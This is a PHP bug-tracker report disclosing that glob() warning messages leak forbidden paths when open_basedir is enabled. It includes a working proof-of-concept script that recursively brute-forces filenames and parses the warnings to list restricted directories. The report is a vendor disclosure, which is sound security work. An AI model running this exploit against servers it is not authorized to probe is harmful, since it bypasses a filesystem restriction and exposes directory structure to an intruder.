From: anton dot kirsanov at gmail dot com
Operating system: ALL
PHP version: 5.1.6
PHP Bug Type: Safe Mode/open_basedir
Bug description: Bug in warning message when glob() function access to
unallowed path.
Description:
------------
When open_basedir is enabled, glob() function don`t show files in
unallowed directories, however in warning message present file or
directory name that access is denied.
If you recursive parse a warning messages for extract pathes, you a get
listing of unallowed directories (see POC code).
I`m, tested this bug on PHP 5.1.6 and 4.4.4, everywhere the result is
equal.
Reproduce code:
---------------
<?php
// -----------------------------------------------------
// POC by Kirsanov Anton ( anton.kirsanov[at]gmail.com )
//
// Description:
// Bug in warning message for glob() function allow show listing
unallowed directories when open_basedir is enabled.
//
// Risk:
// Possible directory listing, when open_basedir is enabled.
// Testing on PHP 4.4.4, 5.1.6.
error_reporting(E_ALL);
ini_set("display_errors", 0);
ini_set("track_errors", 1);
if(!ini_get('open_basedir'))
die('open_basedir not present');
$chars =
"._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$z = array();
get_c("/", $z);
// show contents of root directory
print_r($z);
function get_c($path, &$o)
{
global $chars;
for($i=0; $i < strlen($chars); $i++)
{
$p = $path . $chars[$i];
$r = glob($p . "*");
if(!$r && $php_errormsg)
{
if(( preg_match("/open\_basedir restriction
in effect\. File\((.*)\)
is/iU", $php_errormsg, $t) ||
preg_match("/is not allowed to access
(.*) owned/iU", $php_errormsg,
$t)) && !$o[$t[1]])
{
$o[$t[1]] = $t[2];
get_c($p, $o);
}
}
}
}
?>
Expected result:
----------------
<?php
glob("/*");
?>
Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/) owned ...
Actual result:
--------------
<?php
glob("/*");
?>
----
Warning: glob(): open_basedir restriction in effect.
is not allowed to access (/bin/) owned ...
----
Warning message has been disclose path - /bin/
--
Edit bug report at http://bugs.php.net/?id=39339&edit=1
--
Try a CVS snapshot (PHP 4.4):
http://bugs.php.net/fix.php?id=39339&r=trysnapshot44
Try a CVS snapshot (PHP 5.2):
http://bugs.php.net/fix.php?id=39339&r=trysnapshot52
Try a CVS snapshot (PHP 6.0):
http://bugs.php.net/fix.php?id=39339&r=trysnapshot60
Fixed in CVS: http://bugs.php.net/fix.php?id=39339&r=fixedcvs
Fixed in release:
http://bugs.php.net/fix.php?id=39339&r=alreadyfixed
Need backtrace: http://bugs.php.net/fix.php?id=39339&r=needtrace
Need Reproduce Script: http://bugs.php.net/fix.php?id=39339&r=needscript
Try newer version: http://bugs.php.net/fix.php?id=39339&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=39339&r=support
Expected behavior: http://bugs.php.net/fix.php?id=39339&r=notwrong
Not enough info:
http://bugs.php.net/fix.php?id=39339&r=notenoughinfo
Submitted twice:
http://bugs.php.net/fix.php?id=39339&r=submittedtwice
register_globals: http://bugs.php.net/fix.php?id=39339&r=globals
PHP 3 support discontinued: http://bugs.php.net/fix.php?id=39339&r=php3
Daylight Savings: http://bugs.php.net/fix.php?id=39339&r=dst
IIS Stability: http://bugs.php.net/fix.php?id=39339&r=isapi
Install GNU Sed: http://bugs.php.net/fix.php?id=39339&r=gnused
Floating point limitations: http://bugs.php.net/fix.php?id=39339&r=float
No Zend Extensions: http://bugs.php.net/fix.php?id=39339&r=nozend
MySQL Configuration Error: http://bugs.php.net/fix.php?id=39339&r=mysqlcfg
